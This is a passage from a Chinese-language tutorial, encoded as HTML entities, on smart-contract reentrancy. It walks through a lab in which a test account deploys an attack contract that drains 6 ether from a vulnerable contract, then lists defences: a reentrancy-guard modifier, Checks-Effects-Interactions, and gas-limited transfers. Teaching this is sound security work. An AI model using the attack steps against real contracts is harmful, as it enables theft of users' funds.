&#x521B;&#x5EFA;&#x4E00;&#x4E2A;&#x65B0;&#x8D26;&#x6237;&#xFF08;<code>0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2</code>&#xFF09;&#x6765;&#x6A21;&#x62DF;&#x653B;&#x51FB;&#x8005;&#xFF0C;&#x5728;Deploy&#x5904;&#x586B;&#x5199;&#x6F0F;&#x6D1E;&#x5408;&#x7EA6;&#x5730;&#x5740;&#xFF0C;&#x90E8;&#x7F72;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x3002;<br>
<img src="images/Reenter5.png" alt><br>
&#x90E8;&#x7F72;&#x6210;&#x529F;&#x540E;&#xFF0C;&#x5148;&#x67E5;&#x770B;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x7684;wallet&#x4E3A;0<br>
<img src="images/Reenter6.png" alt><br>
&#x653B;&#x51FB;&#x8005;&#x5148;&#x5B58;&#x6B3E; 1 ether &#x5230;&#x6F0F;&#x6D1E;&#x5408;&#x7EA6;&#x4E2D;&#xFF0C;&#x8FD9;&#x91CC;&#x8BBE;&#x7F6E; VALUE &#x4E3A; 1 ether&#xFF0C;&#x4E4B;&#x540E;&#x70B9;&#x51FB;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x7684; deposit &#x8FDB;&#x884C;&#x5B58;&#x6B3E;&#x3002;<br>
<img src="images/Reenter7.png" alt><br>
&#x518D;&#x6B21;&#x8C03;&#x7528;&#x6F0F;&#x6D1E;&#x5408;&#x7EA6;&#x7684;wallet&#x65B9;&#x6CD5;&#xFF0C;&#x5374;&#x53D1;&#x73B0;&#x6709;&#x4E86;6 ether<br>
<img src="images/Reenter8.png" alt><br>
&#x653B;&#x51FB;&#x8005; (<code>0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2</code>) &#x8C03;&#x7528;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x7684; attack &#x51FD;&#x6570;&#x6A21;&#x62DF;&#x653B;&#x51FB;&#xFF0C;&#x4E4B;&#x540E;&#x8C03;&#x7528;&#x88AB;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x7684; wallet &#x51FD;&#x6570;&#x53BB;&#x67E5;&#x770B;&#x5408;&#x7EA6;&#x7684;&#x4F59;&#x989D;&#xFF0C;&#x53D1;&#x73B0;&#x5DF2;&#x7ECF;&#x5F52;&#x96F6;&#xFF0C;&#x6B64;&#x65F6;&#x56DE;&#x5230;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x67E5;&#x770B;&#x4F59;&#x989D;&#xFF0C;&#x53D1;&#x73B0;&#x88AB;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x4E2D;&#x7684; 6 ether &#x5DF2;&#x7ECF;&#x5168;&#x90E8;&#x63D0;&#x6B3E;&#x5230;&#x4E86;&#x653B;&#x51FB;&#x8005;&#x5408;&#x7EA6;&#x4E2D;&#xFF0C;&#x8FD9;&#x5C31;&#x9020;&#x6210;&#x4E86;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x3002;<br>
<img src="images/Reenter9.png" alt></p>
<h2 class="mume-header" id="%E6%BC%8F%E6%B4%9E%E9%98%B2%E8%8C%83">&#x6F0F;&#x6D1E;&#x9632;&#x8303;</h2>

<ul>
<li>
<p><strong>&#x52A0;&#x5165;&#x9632;&#x91CD;&#x5165;&#x9501;</strong><br>
&#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;&#x9632;&#x91CD;&#x5165;&#x9501;&#x7684;&#x4F8B;&#x5B50;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT
pragma solidity ^0.8.3;

contract ReEntrancyGuard {
    bool internal locked;

    modifier noReentrant() {
        require(!locked, &quot;No re-entrancy&quot;);
        locked = true;
        _; 
    locked = false; 
}
}
</code></pre></li>
<li>
<p><strong>&#x5199;&#x4EE3;&#x7801;&#x65F6;&#x9700;&#x8981;&#x9075;&#x5FAA;&#x5148;&#x5224;&#x65AD;&#xFF0C;&#x540E;&#x5199;&#x5165;&#x53D8;&#x91CF;&#x5728;&#x8FDB;&#x884C;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x7684;&#x7F16;&#x7801;&#x89C4;&#x8303;&#xFF08;Checks-Effects-Interactions&#xFF09;</strong></p>
</li>
<li>
<p><strong>&#x4F7F;&#x7528;send() &#x548C; transfer() &#x8F6C;&#x5E01;&#xFF0C;&#x53EA;&#x4F1A;&#x4F20;&#x9012;2300Gas&#x4F9B;&#x8C03;&#x7528;&#xFF0C;&#x9632;&#x6B62;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x3002;</strong></p>
</li>
</ul>

      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>